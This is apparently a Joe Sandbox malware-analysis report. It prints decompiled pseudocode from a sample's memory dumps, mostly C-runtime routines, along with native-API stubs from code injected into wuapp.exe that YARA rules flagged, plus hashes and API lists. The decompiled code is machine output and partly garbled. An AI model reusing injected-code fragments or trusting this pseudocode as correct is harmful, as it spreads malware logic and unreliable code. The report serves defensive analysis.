                                                          							goto L18;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          					_t55 = _a4;
                                                          					__eflags = _t55;
                                                          					if(_t55 != 0) {
                                                          						 *_t55 =  *_t62 & 0x000000ff;
                                                          					}
                                                          					_t59 = 1;
                                                          					goto L21;
                                                          				}
                                                          				_t49 = _a4;
                                                          				if(_t49 != 0) {
                                                          					 *_t49 = 0;
                                                          				}
                                                          				goto L5;
                                                          			}



















                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009BA46C
                                                          • __isleadbyte_l.LIBCMT ref: 009BA49A
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 009BA4C8
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 009BA4FE
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: ad6b76abea79014822cc53aa1520ab27422f7bd74aba9f43af4f3402a73188c8
                                                          • Instruction ID: 8f52befa4c2e748f79f95a784e2a1c2d106a4ad648a4af1624d9444e3cbe01d4
                                                          • Opcode Fuzzy Hash: ad6b76abea79014822cc53aa1520ab27422f7bd74aba9f43af4f3402a73188c8
                                                          • Instruction Fuzzy Hash: 3131CF30604246AFDB218F65CE48BFA7BAAFF41330F158529F865871A0E7B0D950DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E009A46C9(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi) {
                                                          				void* _t47;
                                                          				intOrPtr _t48;
                                                          				intOrPtr* _t49;
                                                          				void* _t64;
                                                          				void* _t65;
                                                          				signed int _t66;
                                                          				signed int _t68;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				void* _t77;
                                                          				intOrPtr _t78;
                                                          				void* _t79;
                                                          				signed int _t80;
                                                          
                                                          				_t64 = __ebx;
                                                          				asm("rol byte [eax-0x77], 0x41");
                                                          				_t76 = __edi - 1;
                                                          				_t74 =  *(_t80 - 0x2bc);
                                                          				 *__ecx =  *((intOrPtr*)(_t76 + 4));
                                                          				 *((intOrPtr*)(_t76 + 0x70)) =  *((intOrPtr*)(__ecx + 4));
                                                          				_t47 =  *((intOrPtr*)(0x9c84f8 + _t74 * 0xc))();
                                                          				_t48 =  *((intOrPtr*)(_t80 - 0x2dc));
                                                          				_t68 = _t76;
                                                          				if(_t47 == 0) {
                                                          					if(_t48 != 0x9ce694) {
                                                          						asm("lock xadd [eax], ecx");
                                                          						if((_t68 | 0xffffffff) == 0) {
                                                          							E009B2248( *((intOrPtr*)(__ebx + _t76 + 0x1c)));
                                                          							E009B2248( *((intOrPtr*)(__ebx + _t76 + 0x18)));
                                                          							E009B2248( *((intOrPtr*)(_t76 + 0xa0 +  *(_t80 - 0x2bc) * 4)));
                                                          							 *((intOrPtr*)(__ebx + _t76 + 0x14)) = _t78;
                                                          							 *((intOrPtr*)(_t76 + 0xa0 +  *(_t80 - 0x2bc) * 4)) = _t78;
                                                          						}
                                                          					}
                                                          					_t49 =  *((intOrPtr*)(_t80 - 0x2e0));
                                                          					 *_t49 = 1;
                                                          					 *((intOrPtr*)(_t64 + _t76 + 0x1c)) = _t49;
                                                          				} else {
                                                          					 *((intOrPtr*)(__ebx + _t76 + 0x14)) = _t48;
                                                          					_t66 =  *(_t80 - 0x2bc);
                                                          					E009B2248( *((intOrPtr*)(_t76 + 0xa0 + _t66 * 4)));
                                                          					 *((intOrPtr*)(_t76 + 0xa0 + _t66 * 4)) =  *((intOrPtr*)(_t80 - 0x2e8));
                                                          					E009B2248( *((intOrPtr*)(_t80 - 0x2e0)));
                                                          					 *((intOrPtr*)(_t76 + 4)) =  *((intOrPtr*)(_t80 - 0x2e4));
                                                          				}
                                                          				_pop(_t77);
                                                          				_pop(_t79);
                                                          				_pop(_t65);
                                                          				return E009B1E0D(_t65,  *(_t80 - 4) ^ _t80, _t74, _t77, _t79);
                                                          			}

















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$StringType___crt_memcmp
                                                          • String ID:
                                                          • API String ID: 1184073126-0
                                                          • Opcode ID: d41675ac05ddc7bc1163e82c46b9af16f65fd599d73b3b4ebe38d66d826a3d90
                                                          • Instruction ID: 98e7d9b28e4212d626c4dff7457ae6ebe5ec8b29fa03140aa2a72fdd2b263a15
                                                          • Opcode Fuzzy Hash: d41675ac05ddc7bc1163e82c46b9af16f65fd599d73b3b4ebe38d66d826a3d90
                                                          • Instruction Fuzzy Hash: DD317E70A0221A9FCB10DF28CA84BE9B7B8FB09314F2045E9E519D7252DB319D92CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 56%
                                                          			E009A6233(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi) {
                                                          				void* _t80;
                                                          				signed char _t81;
                                                          				char* _t83;
                                                          				signed int _t84;
                                                          				signed char _t86;
                                                          				signed int _t87;
                                                          				signed int _t89;
                                                          				long _t97;
                                                          				signed int _t102;
                                                          				char _t103;
                                                          				char _t104;
                                                          				signed int _t106;
                                                          				signed int _t110;
                                                          				void* _t111;
                                                          				void* _t114;
                                                          				void* _t115;
                                                          				void* _t116;
                                                          				signed int _t119;
                                                          				signed int _t120;
                                                          				char* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t124;
                                                          				intOrPtr _t126;
                                                          				signed int _t133;
                                                          				signed int _t136;
                                                          				signed int _t138;
                                                          				signed int _t140;
                                                          				char* _t142;
                                                          				signed int _t143;
                                                          				signed char* _t145;
                                                          				int _t146;
                                                          				signed int _t147;
                                                          				void* _t148;
                                                          				void* _t150;
                                                          				void* _t163;
                                                          
                                                          				_t143 = __esi;
                                                          				_t138 = __edi;
                                                          				_t133 = __edx;
                                                          				_t123 = __ecx;
                                                          				_t119 = __ebx;
                                                          				while(1) {
                                                          					L13:
                                                          					 *((intOrPtr*)(_t148 - 0x74af00bb)) =  *((intOrPtr*)(_t148 - 0x74af00bb)) + _t123;
                                                          					asm("pushfd");
                                                          					_t119 = _t119 + _t119;
                                                          					if(ReadFile(??, ??, ??, ??, ??) != 0 || GetLastError() == 0) {
                                                          						goto L15;
                                                          					}
                                                          					L30:
                                                          					_t133 =  *(_t148 - 0xc);
                                                          					_t123 = 0xd;
                                                          					 *_t143 = _t123;
                                                          					_t143 = _t143 + 1;
                                                          					L25:
                                                          					while(_t138 <  *((intOrPtr*)(_t148 - 0x1c))) {
                                                          						_t80 =  *_t138;
                                                          						__eflags = _t80 - 0x1a;
                                                          						if(_t80 == 0x1a) {
                                                          							_t124 =  *((intOrPtr*)(0x9cf230 + _t133 * 4));
                                                          							_t81 =  *(_t124 + _t119 + 4);
                                                          							__eflags = _t81 & 0x00000040;
                                                          							if((_t81 & 0x00000040) != 0) {
                                                          								 *_t143 =  *_t138;
                                                          								_t143 = _t143 + 1;
                                                          								__eflags = _t143;
                                                          							} else {
                                                          								 *(_t124 + _t119 + 4) = _t81 | 0x00000002;
                                                          							}
                                                          						} else {
                                                          							__eflags = _t80 - _t123;
                                                          							if(_t80 == _t123) {
                                                          								__eflags = _t138 -  *((intOrPtr*)(_t148 - 0x1c)) - 1;
                                                          								if(_t138 >=  *((intOrPtr*)(_t148 - 0x1c)) - 1) {
                                                          									_push(0);
                                                          									_t138 = _t138 + 1;
                                                          									__eflags = _t138;
                                                          									_push(_t148 - 0x14);
                                                          									_push(1);
                                                          									goto L13;
                                                          								} else {
                                                          									_t3 = _t138 + 1; // 0x9b2b48
                                                          									_t110 = _t3;
                                                          									__eflags =  *_t110 - 0xa;
                                                          									if( *_t110 != 0xa) {
                                                          										 *_t143 = _t123;
                                                          										_t138 = _t110;
                                                          										_t143 = _t143 + 1;
                                                          									} else {
                                                          										_t111 = 0xa;
                                                          										_t138 = _t138 + 2;
                                                          										 *_t143 = _t111;
                                                          										L29:
                                                          										_t143 = _t143 + 1;
                                                          									}
                                                          								}
                                                          							} else {
                                                          								 *_t143 = _t80;
                                                          								_t143 = _t143 + 1;
                                                          								_t138 = _t138 + 1;
                                                          							}
                                                          							continue;
                                                          						}
                                                          						L34:
                                                          						_t83 =  *(_t148 - 0x10);
                                                          						_t140 = _t143 - _t83;
                                                          						if( *((char*)(_t148 + 0x13)) != 1 || _t140 == 0) {
                                                          							L58:
                                                          							_t120 =  *(_t148 - 0x18);
                                                          							0x74a7428b();
                                                          						} else {
                                                          							_t145 = _t143 - 1;
                                                          							_t86 =  *_t145;
                                                          							if(_t86 < 0) {
                                                          								_t87 = _t86 & 0x000000ff;
                                                          								_t136 = 1;
                                                          								__eflags =  *((char*)(_t87 + 0x9ce408));
                                                          								if( *((char*)(_t87 + 0x9ce408)) == 0) {
                                                          									_t122 =  *(_t148 - 0x10);
                                                          									while(1) {
                                                          										__eflags = _t136 - 4;
                                                          										if(_t136 > 4) {
                                                          											break;
                                                          										}
                                                          										__eflags = _t145 - _t122;
                                                          										if(_t145 >= _t122) {
                                                          											_t145 = _t145 - 1;
                                                          											_t136 = _t136 + 1;
                                                          											_t106 =  *_t145 & 0x000000ff;
                                                          											__eflags =  *((char*)(_t106 + 0x9ce408));
                                                          											if( *((char*)(_t106 + 0x9ce408)) == 0) {
                                                          												continue;
                                                          											}
                                                          										}
                                                          										break;
                                                          									}
                                                          									_t119 =  *(_t148 - 0x24);
                                                          								}
                                                          								_t89 =  *((char*)(( *_t145 & 0x000000ff) + 0x9ce408));
                                                          								__eflags = _t89;
                                                          								if(_t89 != 0) {
                                                          									__eflags = _t89 + 1 - _t136;
                                                          									if(_t89 + 1 != _t136) {
                                                          										_t126 =  *((intOrPtr*)(0x9cf230 +  *(_t148 - 0xc) * 4));
                                                          										__eflags =  *(_t126 + _t119 + 4) & 0x00000048;
                                                          										if(__eflags == 0) {
                                                          											asm("cdq");
                                                          											E009B3F56(_t126, __eflags,  *((intOrPtr*)(_t148 + 8)),  ~_t136,  ~_t136, 1);
                                                          										} else {
                                                          											_t147 =  &(_t145[1]);
                                                          											 *((char*)(_t126 + _t119 + 5)) =  *_t145;
                                                          											_t102 =  *(_t148 - 0xc);
                                                          											__eflags = _t136 - 2;
                                                          											if(_t136 >= 2) {
                                                          												_t104 =  *_t147;
                                                          												_t147 = _t147 + 1;
                                                          												__eflags = _t147;
                                                          												 *((char*)( *((intOrPtr*)(0x9cf230 + _t102 * 4)) + _t119 + 0x25)) = _t104;
                                                          												_t102 =  *(_t148 - 0xc);
                                                          											}
                                                          											__eflags = _t136 - 3;
                                                          											if(_t136 == 3) {
                                                          												_t103 =  *_t147;
                                                          												_t147 = _t147 + 1;
                                                          												__eflags = _t147;
                                                          												 *((char*)( *((intOrPtr*)(0x9cf230 + _t102 * 4)) + _t119 + 0x26)) = _t103;
                                                          											}
                                                          											_t145 = _t147 - _t136;
                                                          										}
                                                          									} else {
                                                          										_t145 =  &(_t145[_t136]);
                                                          									}
                                                          									goto L55;
                                                          								} else {
                                                          									 *((intOrPtr*)(E009AF100())) = 0x2a;
                                                          									goto L3;
                                                          								}
                                                          							} else {
                                                          								_t145 =  &(_t145[1]);
                                                          								L55:
                                                          								_t142 =  *(_t148 - 0x10);
                                                          								_t146 = _t145 - _t142;
                                                          								_t140 = MultiByteToWideChar(0xfde9, 0, _t142, _t146,  *(_t148 + 0xc),  *(_t148 - 0x28) >> 1);
                                                          								if(_t140 == 0) {
                                                          									_t97 = GetLastError();
                                                          									E009AF0DF(_t97);
                                                          									L3:
                                                          									_t120 = _t119 | 0xffffffff;
                                                          									__eflags = _t120;
                                                          									_t83 =  *(_t148 - 0x10);
                                                          								} else {
                                                          									_t163 = _t140 - _t146;
                                                          									_t140 = _t140 + _t140;
                                                          									 *( *((intOrPtr*)(0x9cf230 +  *(_t148 - 0xc) * 4)) + _t119 + 0x30) = 0 | _t163 != 0x00000000;
                                                          									_t83 =  *(_t148 - 0x10);
                                                          									goto L58;
                                                          								}
                                                          							}
                                                          						}
                                                          						L60:
                                                          						if(_t83 !=  *(_t148 + 0xc)) {
                                                          							E009B2248(_t83);
                                                          						}
                                                          						if(_t120 != 0xfffffffe) {
                                                          							_t140 = _t120;
                                                          						}
                                                          						_t84 = _t140;
                                                          						return _t84;
                                                          					}
                                                          					goto L34;
                                                          					L15:
                                                          					if( *((intOrPtr*)(_t148 - 0x14)) == 0) {
                                                          						goto L30;
                                                          					} else {
                                                          						_t133 =  *(_t148 - 0xc);
                                                          						if(( *( *((intOrPtr*)(0x9cf230 + _t133 * 4)) + _t119 + 4) & 0x00000048) == 0) {
                                                          							__eflags = _t143 -  *(_t148 - 0x10);
                                                          							if(__eflags != 0) {
                                                          								L27:
                                                          								E009B3F56(_t123, __eflags,  *((intOrPtr*)(_t148 + 8)), 0xffffffff, 0xffffffff, 1);
                                                          								_t133 =  *(_t148 - 0xc);
                                                          								_t150 = _t150 + 0x10;
                                                          								_t114 = 0xa;
                                                          								__eflags =  *((intOrPtr*)(_t148 - 1)) - _t114;
                                                          								if( *((intOrPtr*)(_t148 - 1)) == _t114) {
                                                          									goto L23;
                                                          								} else {
                                                          									_t123 = 0xd;
                                                          									 *_t143 = _t123;
                                                          									goto L29;
                                                          								}
                                                          								goto L60;
                                                          							} else {
                                                          								_t115 = 0xa;
                                                          								__eflags =  *((intOrPtr*)(_t148 - 1)) - _t115;
                                                          								if(__eflags != 0) {
                                                          									goto L27;
                                                          								} else {
                                                          									 *_t143 = _t115;
                                                          									_t143 = _t143 + 1;
                                                          									__eflags = _t143;
                                                          									L23:
                                                          									_push(0xd);
                                                          									goto L24;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t116 = 0xa;
                                                          							_push(0xd);
                                                          							if( *((intOrPtr*)(_t148 - 1)) != _t116) {
                                                          								 *_t143 = 0xd;
                                                          								_t143 = _t143 + 1;
                                                          								 *((char*)( *((intOrPtr*)(0x9cf230 + _t133 * 4)) + _t119 + 5)) =  *((intOrPtr*)(_t148 - 1));
                                                          							} else {
                                                          								 *_t143 = _t116;
                                                          								_t143 = _t143 + 1;
                                                          							}
                                                          							L24:
                                                          							_pop(_t123);
                                                          						}
                                                          					}
                                                          					goto L25;
                                                          				}
                                                          			}


                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 009AFB7C
                                                          • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,?,?,?,?,009B2B47,?,00000080,00000003), ref: 009AFB86
                                                          • __lseeki64_nolock.LIBCMT ref: 009AFBF1
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,009B2B47,009B2B46,?,?,?,?,?,?,?,?,00000001,00000000), ref: 009AFD1F
                                                          • _free.LIBCMT ref: 009AFD52
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharErrorFileLastMultiReadWide__lseeki64_nolock_free
                                                          • String ID:
                                                          • API String ID: 1844164652-0
                                                          • Opcode ID: 167563a59dbc7d756b962afadd364715225c2f6188a19923c487cd5d41a89af2
                                                          • Instruction ID: e83d34a6351770bb20fcbe2a14f7493020441cfe0f9b0acd19aea8c2788bf9b3
                                                          • Opcode Fuzzy Hash: 167563a59dbc7d756b962afadd364715225c2f6188a19923c487cd5d41a89af2
                                                          • Instruction Fuzzy Hash: 6F210B35A042059FDB11CFECD864BADB7B9EF46720F244479EC95DB291C73498458BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009C2241(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                          				intOrPtr _t25;
                                                          				void* _t26;
                                                          
                                                          				_t25 = _a16;
                                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                                          					_t26 = E009C27B0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          					goto L9;
                                                          				} else {
                                                          					_t34 = _t25 - 0x66;
                                                          					if(_t25 != 0x66) {
                                                          						__eflags = _t25 - 0x61;
                                                          						if(_t25 == 0x61) {
                                                          							L7:
                                                          							_t26 = E009C22E5(_a4, _a8, _a12, _a20, _a24, _a28);
                                                          						} else {
                                                          							__eflags = _t25 - 0x41;
                                                          							if(__eflags == 0) {
                                                          								goto L7;
                                                          							} else {
                                                          								_t26 = E009C2A64(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          							}
                                                          						}
                                                          						L9:
                                                          						return _t26;
                                                          					} else {
                                                          						return E009C2985(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                          					}
                                                          				}
                                                          			}






                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                          • Instruction ID: 17e066fa11468b813839086f4db12a5240bf5f19a64551474df990d6bf1a586b
                                                          • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                          • Instruction Fuzzy Hash: 5E01403280014ABBCF165F84DC41EEE3F26BF29354F588519FE2858035D736C9B1AB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 295 aa34a-aa3a1 call aaf50 NtCreateFile
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: c0e56e0d9cc9a6916effb2bdfe839b2cd039b9d22b91e97cf9b0dc550c7ab15c
                                                          • Instruction ID: e870a0d329ca03155c4363f3f6b66a4fa27199b89f6cce099237069e8379dfe5
                                                          • Opcode Fuzzy Hash: c0e56e0d9cc9a6916effb2bdfe839b2cd039b9d22b91e97cf9b0dc550c7ab15c
                                                          • Instruction Fuzzy Hash: 0A01B2B2200109AFCB58CF99DC85EEB77A9AF8D754F15824CFA5D97291C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 298 aa350-aa366 299 aa36c-aa3a1 NtCreateFile 298->299 300 aa367 call aaf50 298->300 300->299
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: 47d22afac6c8386adbdb7d2fe089b92fe384463677c00205d09c8920dd04da9a
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: F4F0BDB2200208AFCB48CF88DC85EEB77ADAF8C754F158248BA1D97241C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 301 aa3fb-aa449 call aaf50 NtReadFile
                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000AA445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !J
                                                          • API String ID: 2738559852-747486036
                                                          • Opcode ID: 681378be82cb75fca8b1af601ef411f883547eab9a2786295c328b7fc403c216
                                                          • Instruction ID: 258df40ec44b9799fc1f704493aed65e979cc41aba06219bfc6837af385516cf
                                                          • Opcode Fuzzy Hash: 681378be82cb75fca8b1af601ef411f883547eab9a2786295c328b7fc403c216
                                                          • Instruction Fuzzy Hash: 71F0E7B6200208AFCB14DF89CC91EEB77A9AF8D714F158258FA1D97241D630E811CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 304 aa400-aa416 305 aa41c-aa449 NtReadFile 304->305 306 aa417 call aaf50 304->306 306->305
                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000AA445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !J
                                                          • API String ID: 2738559852-747486036
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: ea0736737f91792071ebeb698e733047b394ffabb82d9b091c02cbb2f7691619
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: 56F0B7B2200208AFCB18DF89DC81EEB77ADEF8C754F158258BE1D97241D630E811CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 310 aa47b-aa4a9 call aaf50 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(@M,?,?,000A4D40,00000000,FFFFFFFF), ref: 000AA4A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: @M
                                                          • API String ID: 3535843008-718900356
                                                          • Opcode ID: ebc51a09435a68d2cc7833ce378eed4e2059f018e97a588cf6071ab07bbb4f1f
                                                          • Instruction ID: 05a30ab368933bdc7656f2c4bb3066a0c02362e531ded7fb35d9bb6cce12d198
                                                          • Opcode Fuzzy Hash: ebc51a09435a68d2cc7833ce378eed4e2059f018e97a588cf6071ab07bbb4f1f
                                                          • Instruction Fuzzy Hash: 5AE08C75600200AFD720DFE9CC86EEB7B68EF85364F1041A9BA1DEB282C630A500C6A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 319 aa480-aa496 320 aa49c-aa4a9 NtClose 319->320 321 aa497 call aaf50 319->321 321->320
                                                          APIs
                                                          • NtClose.NTDLL(@M,?,?,000A4D40,00000000,FFFFFFFF), ref: 000AA4A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: @M
                                                          • API String ID: 3535843008-718900356
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: d407a012ec43a561f709d0a4e24f1a77566909f608e5d01d4c891e5cc4d79cc1
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: 93D01776600214AFD714EBD8CC85EE77BACEF49760F1544A9BA1C9B282C630FA0086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA569
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: 99c5722ceb25330ff66acbf4786c1a9a39221e89e92c316f095899b835b15410
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: 07F015B2200208AFCB18DF89CC81EEB77ADAF88754F118158BE1C97241C630F810CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
